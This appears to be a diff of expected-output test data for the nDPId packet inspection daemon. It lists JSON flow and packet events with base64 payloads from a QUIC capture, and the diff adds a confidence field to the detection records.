 00631{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1621503088279,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621503088279,"pkt":"AAAAAAAAAAEAU0VlCABFAAViNs5AAH4RIneokEAFmWIcTtNoAbsFTmuQxP8AAB0IeGU\/mdbeLGAANwAZh+l9xBKAiSKB2OhrwN\/hzDl51JMe7JNbapPLHMOjmgDUc0Kyw120FAqWdbLajL0G7x+rThpE\/ezHsYo1+wzly8xUgAolT2BsTpI2RHGJFl7PB6kKEbj1oJ2aRfN0feK0OGTrmVtkNP9R+\/rEuFjr\/5ftbiLlMiGuS3H3QpNIn1LP4hRzRdMhEMaL4tpWijpslIEyIWPJUu7rklLDODiHtimhfIO2wkBoYI2kQY+hFw906HJDazA9cw+osFQ\/bzvopugZzilDKv1JaRYx1e4+hqHH6L6B1UH9\/T9\/HnMV2EpDa0Av+iDS3F9RRywHXZAIhY03mMeM7GrJP2Zpz4QhJct7zfEW3x535nQ0edWGlDKJvLXrTJAeOpJnOxJ1r4baAFi3DRD+vKNPYnsuGfuIY65dgPclLbLGQ0fUutzS5iBfTHGDPLr8VDoE6brnwH\/5y9mzczXm\/kEf07xeWOu\/1opIMye\/Yn9rwK9T2MMElD6rrbD6Gahnp2r9RHhIeVU09JhM9hecDnkQZ6178V6oPYtSdjz2mTGsw+LPdfT9S16RCinAfrzSX3fRQtDiS\/0lA192fRii3J2KEljzmCRknudcAIFxTdxxb9A\/G2TbmLeHepNu2Vz0i6tcgUnXVFPrdPymqw79zhx7DrjVNwDXeclunhYwL1E7tG0V3PTUnBzD7E5OrcUKHgdfHTYLI3pYV9K56ZSwrEMPYw6PdTGd6BMaZRgmv1zwBM8F3abkA+q3Zf8DmaTM4yYqUGdqKt\/rsJPP5R8bBJC\/k1fqIhjEgyfV75RWWjvPOT8vpG\/Zf\/Lwho7iMvjqjS6+1DpZLIajkAZ0nPm\/rm87HLI0cdJpxuRH1pwBLDdf8pMJ1mfSHXv93VQKMlba5U2bhfGH1Mqk7jCyOgbhoG\/iErOEjUrAiw7X6OQncJiN9Mkd\/SEm\/\/RWlqvwMLkvGjPHLC5e7V2TGXlnOhRlZBU7qILrPVNtxU7dCPtBdbxIDti1\/YRndJCIPzLPa9h2mTEfoIgDEaAE\/7UawhYqjGFuPu7cykm8DYwvbzLfyH7bht4ex13mlrd\/FiPYOE28osrwhi1PWiAzhV1qXqi4+RWmb\/5CisAguq7jYLc0h5FGHrR92KCTjSdBEZ\/DAyNwtWa8nS6w7j5Hbinu4C0ABTwJE2l7GH4ZQ9omOr49dyeQCQatUwx0VqYJSDhoVCe0TCuJntWa02NbIeePgGo8pWxM6tgM2H8YNfSNUF9avzsSRS2VyMPLnBXpk9KiQb0mc7BEeTRigvV1S+9XKWzbnd+uq94u6ElOSGdKojQAok0wFU1sgFBAgT2mV3C3\/ZQ6n6G68vFnfmO5+ZuiNec\/P1VvDC8vVIjLmaMCjrgt9+jDuswwkMDFQIciL3t4FUlUJM2MVHvkdLHSo3q+qgTRtHtpBlxLgaLGkfaorEJRtfDW1GQLecYh1sTrhehn3QcG0nR2Ih8nO3MktWlFwRqGrK\/t0Qsdsusr3bQ36R8F1tTznS8ZWGUFNDf+Lfwf1VRU+IBvCx3kULbMabelEKmImDqvXmP2zB2BjWHst539anbYbajQw\/ZgddvVcRhVSUqIpiPQ7wJ7kw9\/TtjeFcmJbCOn4TBNtXEAFcmESf+wEZSMAzbOoMV2uJojX02TEHH7lGyR4dilgOga\/fEzmhXhoDwn+0SuTYueRdcC6yi0FFtVe7SxyfJXa\/en0rOfO5K8UmxsGwQRxH4PjiJBdspE+yoKaJq6B76ZXjWQshEvVjgOi6H1dYlUSyL2zSCF"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1621507440293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621507440293,"pkt":"AAAAAAAAAAEAU0VlCABFAAViN3ZAAH4RIc+okEAFmWIcTsysAbsFTp5qwP8AAB0IikGMkqg\/9wYANwBCbbDOkKE3I8tUrhP0019VoFQ42OGxkeSDSRfCVHVFzGS6OlWzWiT3fji2Q9e2uBbhaayYtc5E\/X007tKAEm9FuNGSPz7TI818Sttxs3ujdp1DhJh+NpZfeeSISitSIGvg2MzufhYYrAjbhnoT1XHoGCBc1rAFUoO7UMuAGYC8SYPLocVC73lmAf9DYHNSe5fUCJSAAH+oZTPgR2yZUUzLo6fywQUMulJGI+tO3nXiCpCmWVZ53dVEiIJeeIojZJHsLSZxfmkzXZWYlR6uPBugjMWutrpp3d5v3AuvY2G7Qyk4Lv7MAfdysMbwBNbNtmNdfZPJ3\/pEPVHOv\/559Dp4RvW50HvpUKtGVrDOqJeFYelmkJNmPICcqoerayf1TiCARBZAnCn0MwD3qiNb6ZcgubQ3lYbFhXEcXw4p1oo9c4om8zLGYKCC6gMxWMZoaZf19pIOW1N7yHt\/SSfp8qPr7X11LuJnuqgknnxWBGr+1wZiL2PTq482lAJ6gF5Z2f2tN3XLZipWQds6Bo6uWSETMHj4LlIoOeoO8q99yIrIxEzO\/f4j83sVtl5ErO58R6yY0ijEedgoeOZWD8SVQDMvzkmLAx1dLgYjNi3zBdewahsS63kzpEcxno1c5HXpfC65SPUfK1u9t7lKXuScst61LMT7gD4xRvgi6ny4pOwNfDlEoBJxFCoaEzFQba0SYnQmz1wlKHdeciad8aWCTIM+4CgIGyXfMd+X+XFoeu3ajcjzAF7n6JeYn14EGnQY8unzlXF4p3i93fMCw\/xlMi\/OJq\/ruw6eUXgNqb3nrxm0BR4ksvgfkB5sFTJQPZzM8zEmRDSqngasEorcI7WMz8C2mGoX59tOv7H86rOq9kc0rL9XtCb+NWplconR2ejygYELbikOOOslKugW2zA2OmoHHi2Na4MTk66Md2Uuf6WcAKyFaaQpjc\/tMudn3z3HXrJde9BcZI846R4IemkxY1\/Z3QY1XcsM91Esz8+Pxd74AMqufrPf4mE2zfMQfa4C4336cepitLI4wuJ1hBcTktGeDMWo3AxuFTPzMyx19tB4Pb+QiQvYM29oIx\/p58YHbJiRBR\/2VW0LXa2VmGF1yjBfbyTyaiW\/0aG3AMd+pDl8N8KLpVPA44wpekrJkebyMJOc8G8y2nyC0MA6L1m0olcRvwsPyg32HFyPdlugxC3gCUDIy+\/UdsTVejDWt8G3KF2zBl5z4vUQG7szc5MTIFEplmTziOxG9vpu8uPAGk3JSUOmEY\/36oGBDkAhxzxaUR5tfsiouiWurq0NGGO0Zerjexoy1X+rM8JONjVsJbya5hJGT1\/EyIrr8IuI\/DXHAAsxAOhU117x75sR1FYPo+cPS2OX2Aq2eYhfspxYNG0jwN\/TrKrZDda9AWe9Yds2HmJkKmWUnQVV7eJUFPO+7T5F\/7VpvLpDyDx3HI9ZxDJv4+lVDYmr4M7ancc8vSp1QLKUuXa\/RRdLhFE4WpkMwIllcvDn6w2IGiZvdFwwcz0o7+lWiab+FQFJvQj5W6kBnsxHpASo8358\/GjTTHB+z0Y8rY144soNEgilV0+eFQDnbygqPbwyW1XcdsOUsoU+5ncfr9q8EY2mvfVYGA2HoIRLv74rd9Hgq035d00HMutEK92GJr8ZYm+qplcEu7zCn9\/SDJP9SVZthGjepNQwhkU8gZjaxDt0kSAy5LpSeuV57eDXzlO\/myoK40cRqGjj6TY\/1mZZ4XZJntQPKWyMGIHJzxZKIYXKlVPoQnqi25JmgSDVSszE"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516392616,"flow_last_seen":1621516392616,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1621516392616,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516392616,"pkt":"AAAAAAAAAAEAS1QMCABFAAViOJBAAH4R+wiokEAFfgNdWcQwAbsFTuapxv8AAB0IERdUk7u04\/YAAEU0aOs+L2NbS8h3vY4IEyDvx9d+UduEUSP3UFQHQG3NjO459splk2VvFwj2AOb7c4buoNQkQrDX9vOCnfv2vAKh3jO4JsUMREjT5vNEDbeeIao\/p5PHGkGHQhyZBJDceMVmmdTd\/uhtDdk+j6PWnF9UbEFtNHo58b9XyfB2nWQ06pT3ZlYQ9WK7gVb0I12TtO\/1JgOp7SeP5Djnc84cBKVneYBg230rYLPChbpIzOYDBN2v71vSy3clCOV3NHQe9++jSFmz01AIsjPo0b7oAK8pqXiYvEW7DTC9VlrG7gxRC86BUuyPkAEhQ20RdVW5Yf10xFe6ayadGDnT237OAKo\/\/+O\/LFyNHbgVfKniSrMFRiGghfY1wLG1Jv\/b0caXf12hI0LoNCqVSPEG+EnSUUM92WSb0C9QePh4RT9rbvZi\/xbgMAiaBMtltwa7agMAD0SUEyPtFV3C+8gLuPxCYmnjIpV33zbnthqAcxQlIZ2vrKiyi+KhmHrNr9GObbxxrlP9ljjIiTHt\/t7pUOT1Y8FS6S3BV52+5yFbyKd0LCCvLS6o06nay2+nbWpq3MMEnIy2ErrDasXDV\/yTFWEtS+9f7sWO92IAVmXzrxbK093nsF5MajPhwq3Yj7enMlLFnsX3TwRJhVqvSkB7sppzgxggdf79L1raj9XW8XM8V4sShlzqKJNXWgV0Ic3AYwyNJp1wBL5vRbaDded8wpXErdg1Guex9BOOifEyh8ItX4yvCdMmUa\/SxdZy7sKrylT5MXV9b5DrpfLxY20Ij14Lk6JWUcZoiy3j7yw\/ubYUYzuIFwHCLS1lok6SgHEGlrR8xjkxHY6vGzVbWVDiYYq6XgJZVyWx9Zr21JeGPGR+US5r1E4SSQfwwOWaQavhUq2zrf51HYEGZm8p9Jic3+SIN7YCHgoI4i\/tTXM\/YmMyB3h7wKOaf5t8OBGmgTLUm+k7i6hbT9r3Y7OmK2kRsbBa0dHYNr5d8T\/VGuiypPl4TtR89RXwIfmo1y65zMEsqRFLzkK6P2g287jebk7ShyfkPP1oD8ZNBDlbBORa2duW2pLxkyuhyWajEEIi5IZPiaUkWm07VY\/3CTB8jOxZ5+izKU77hZEJk0XVWc4uEb\/QQAq9sUOziToveEoxQ8lVzljsMp2uan81z84MDcopGEBneePiZuuVSoKKmRlgQlyZ2l\/7Ctf2AtaE8R8Msu4a8A0Bz498uXG67md1GQF+0zH2XGFwQZi645tPEtwFrQVnFbTEKZ8BXx7Nap4taxxtpDt5spf5pj+Cxj9r7SClNizeuJvypZINANHTovJYhzPRhqHIpBWwpQfA3PntHJITXnxC4WmNYJAZCKBpSBcum+oGhD\/2Un0c0TlEt\/thcPjAZzpaUDcVhWpBWCVkKgQSFLnQ\/+DBcsrUFMD+140pVgLHMyZ9SjqlyJryDXQYG97OhxHyQHBDtRUXSWiUupn5VQi6HXycsWOMWUIstNHGKJXGdHz1DTnhQOAh42MqA2+rEX\/B24vMgaRhWIP3wZKncvN8OnaQB1uLmAogRZC7n6Oq2DPqNrKGHl266GYXia9wtsSy3dBXWQj5ABuS+XuL0dLpYt1yK3fxHMTM\/IAuOD+tETJOkfaID9ExjejoJQhKxG9A+2SEOwuBb0RuAAN64trhUk+RRj7+3dvdvvBaNmCF4ehH9m8kVXSuv99l731dIsTYFWF+01uzy3N0iDA4kBqgoPzkJX11gEEbpzeVX+FAdEn0TRFND5ubmH+ZdrnKSeLG87FfotS2"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516392616,"flow_last_seen":1621516392616,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516392616,"flow_last_seen":1621516392616,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1621516392665,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516392665,"pkt":"AAAAAAAAAAEAS1QMCABFAAViOJJAAH4R+waokEAFfgNdWcQwAbsFTnBMwP8AAB0IERdUk7u04\/YAAEU0zZjp5d5N6z\/WFA1lBa7twBKX0QRDGLtlGmrXu8OpTBord0+OkbPX1c+PKlW1HAveX2hl7a2SKNkWfqYq58RzhqPWQX8bJuDEK8QKFY4N+fXvuJQuur2+wvIp6htGMnZMaAbzhBA68UXq8yqU4hc2a+yvi8q4Gw7qqb2E+jQUTHk\/UukIin5b3rNaLV29NbBtWWNxlePTd93OZVj7QCJVLus2fJCorUUrEQ+2qk5TnhfU9vsdmwx6IB0A2V9iCFudvKs3BZw6vMH3IleWL4m28gaDZFP\/Ll1+v0Cc0\/AhFgLuXnl4qKwc\/obxKbmZlIGLki5S8VSZsLsbZ0SY1dkVvRGgIQxLaExGsBGDsaP+GndXysNiZEoeGRVchLs2DAR9qG5bMjgc7F5c5b\/ooLBc6LekgqqXf0tYcNX1Ifb+9wWk9X7iYP2Nohxdjnln1PhhyFwwH33ccWEqs7INdIHG0pL4nnPScbjfx7yu4Bl0u5Gtz4zNTt9QkKj5iXyOT5Src6TBHalY8bYLvFDVN278pDT5QBdyLWL7oEpNfadXlpZ10SwBin7ywrf65HMlq5bMAPMBrYBhN2FpXmFM7cNtjWb2z2poAa89ojyAupp57XE\/vGPoBwccHb\/t4KO0u9+7ez5lsvxmpIWlCrsPHpI1g4mfO0K2EWFNk3Anr5nH0wYDaUe5wOdCxEbFvRUdCRA01RtABZ5xVMjlvM8apoN8Kn4WqEVHqc5yj0PWs63tUuuePQgwXAECstJsxODvlCazmTdvKFbpo4qJajXrsQCBK6CwTnJEHkWh2mXvAGZwTHKUoMREShbDu\/ALsa3MRdWCNgGf\/BKvqu3kEuPwv1flG9yIxqvtgt\/nUgVhX3\/Ca1qAiaNjv7PRG81n2utVIxCfJg2zDgTLIG+9kYRojM88Z50VdViswbxeaODbKLE4IZe70itf5BYmC5dKaOzsc1ubxfFZvyC5VvBiBKSYWr5eTrbV\/NAAOEFnJYlB25Y\/wg5kPi5dO6dlYjozGtNWPP69zhjoPqpEPKFrsuOmeoUe4bZiVs6v7uB2yz2vl80ozUBKDNkWC2YHCMAf9HVBqE\/Mrt2IBeml6QzS3foYzW8wnBHIkRYVazQQAL0CkiDaOIBs23kvmXeGNY5QiT\/Km9NqiagmZpg1i\/Uv\/usaNSyltg40pMPgJzU+fBzo6AsEexyAOsD0pOIzojnBHkDyfX8A0JBzcIDRpV9jCxmP7HsW1JHDjEKth33XOpXP4gDE6MpCcWx3aAQ25e\/Bbpo8NtEeXF+yfPpvkKflVU+1JItk4qF2JL18pe6Z67OwXqMeVLCHeCYdcqAj4sDp\/bAaRMI1tux95ugztq9AD9OCfXb7G9t26ZLM8YTPeASjTdA5CYfpVHz2sX+woEDbxgjEJDs3sZI2EbLnMd+FueWt5JCuzhqp3U5HyfeCPvU2mr2VjkVlXSb3047h4hytv8T4GBpas5I7NhJQapwTo5LfsKX7Mofqiz53K16cNDqT3ZnIMna\/K4y7sDYs2X9mNTMDSYNIa\/4FeLiBH8A9L+U+oFbNXmIyIVYmhmeDNmPteEfmJfyF4FJIw6CUlzL16NlD5ssHr4ol3Z79gMSJGLQS1wH+8WFBeMD0+KjhLFq\/QPvILGL9RPCnU5yLgqiEMFdnCJHT+ZurivJX+hoHYujvsctlp\/8PU5VIpt04NJgCfEENhOzbQEZU18nrANoFpuXZVXdkrNZsLZUOPV8zsYwed0ZzXePATCJOX6zTH2LfV9PIzmKH7BHP"}
 02293{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1621516392762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516392762,"pkt":"AAAAAAAAAAEAS1QMCABFAAViOJRAAH4R+wSokEAFfgNdWcQwAbsFTl1Yzf8AAB0IERdUk7u04\/YAAEU0eDSMkBqrJmW6EJydxfwYF72L5nA6GrUPS3rH7Z4vAyXuRcxweddOKkASX50YBAhvaLVxmGJ6U6qmlUaUw7wG8uSjq3TUIdXhWTeA+Z8ZzjqDFIfVneiA0t5M3mNujQZuBubvDwsegbm5eznV7L66suC6BXbOSCIHvH7evlKO6ATwg5tFxeLwg2dQBmNXzcLpzP1hzfGeMKtiH0JWitHqVA2mzm27Mqt1iHbI076Nsu\/4wMO\/W3XkBTDzfNpPgFnftIbYHoXizWVyohtZerA2ZvknSHAJeoqUBq7N0ufeG0vQIdU8hj48c7MRPCJCF9m695quzN39M4n681LXz0x+pX82b6l6TYZlG14513IC7J2U8oNEfwDSayIe8G0CHV1B3ACOgwK9t5t4KOGH7tv4L\/cA\/218vC9QHWHbroomZJmAC62kahwkvbYEjTzFd9QROuCb6woHQy+U88o9PpFuhfBgntQxEdQlqOWULrlZ6tbg2bSyiDxgnq2RrpAHjTxjl94pfsNUVIs9mK0OO8D5idshzlgmF6d17h7PFU6G9dorGkzm4NR6WUaKBOX+5gSFRrfk9rmnT3D53pwkp+KwVxARzjieguJXcogE0fhlCx+gKMRLvNXNYJlLzUoWsx6Y99ImuInElR30vXJvdA2zs2nyF4Izn+Sk2DvY+QdXvwE9gHT6M7D4sY5EHqjt6KAbClo9EWMzbzYhRdVBmotRbwUHzdWJoeafqSv6L3CKvUgJLKdu0YTajaVfkj41xch2Lohpe1p0RenuUsL7ERmQDgXPtrDNmvKz4XuAVEatNNYtceCXUr5rdb5Lay71T9qiuyJKgim3ApBGMzP2iOye5lAvL866w2TLUpfUcidNdjXakFFn9n65PMZ6mDXwIyth\/ETgBN7SyydimVKIk\/PkZC9Fg87f0vvO3grQHqUwDXSy5C0ztCgLy4Kaj+w39\/+zMgQLtjVs+9MRI+QyX4wHcxEAAKsDRVUal8I1t8UL25IJOIq86\/r0xJiOkSj0kF7WH9JqnNGH8+vmx6wgfCGnSI8zF1hr5NX3GOJjLqQ1U62XnJ90MIMkAhzBGer\/LGGVrS6W8xwobLnDBjP+gY09SHeFhdhAl\/eHpQg0s5R6ajAOqzjxGrHwtQziogeGwNpLFYXeX26h2mya6EHocWd4AXToiALDaPovQ7BUR40eP1NntQAWvSeuXAg4pR4Cun5d7LBjxkusmb3mE9H1Q+SLPzSC3KFAluSJZPze6abbazoXFzylXQTpl4YShg+w\/ZLee65FD7UbMvlCi2YOhpxl2oSVCkcd6UcWVItAiI91tALf89089cLcaf13TmGVO37bo8M60FjQZbY7IUQWTfBByLdIUrlG2l85aPi6R0Gv7Zgs9S7k6DvvsM2+Y8RZPzNE2yDKa3XOIxMuhHqpwcS1UiV9F8HZiDY7KAlK19HCyzGhwULC70LPMz+Lwyapr7kCcK6\/8uWl5EcgoBoQiGvXwUqKPqHplF5+pV\/+G96yrYK2729Ao1kcgwcblSXl7srLyRzMa1+N8EdtZ9w4xIIwWcmnoBW6k1pdwgIl3c9AZMQGynRVyFRdZE1ZgfE8pfV4nasitaR0M3gCMYKiLDWmRQiwD21k3IMkRH9lJ2iOuPUh9+SgcoHk8JKhhw+kVCfqGf7CsS8YItVTzzB+AlHzKfn5wPUKuhNr\/8ITyM1jWriraMh4v+v0GwqJXfRoEInWjIVWUPSsW3pM3ZIVbZ1\/BRcboa3+lLOz2oGo30HhPaksnLSu"}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516401935,"flow_last_seen":1621516401935,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516401935,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1621516401935,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516401935,"pkt":"AAAAAAAAAAEAsa95CABFAAViOQpAAH4R46+okEAFH9vSYPT\/AbsFTrroxP8AAB0IsiNjxAytUVgAAEU0Rqh1oTS7oO8cafTa28fAea2TrPFqW\/nlAJ184K2vdoORXSVeVMo9P99lJizlhuQtwjqOuZDX79HEkhTLfn6mYDJm73BPHv24qL5kCOPeP9TVOodlyLNO8CXYBxsAfImX9sw\/xiXEYv4nPCZx7phxoORVmsG2TXdTVZpBuZ8d7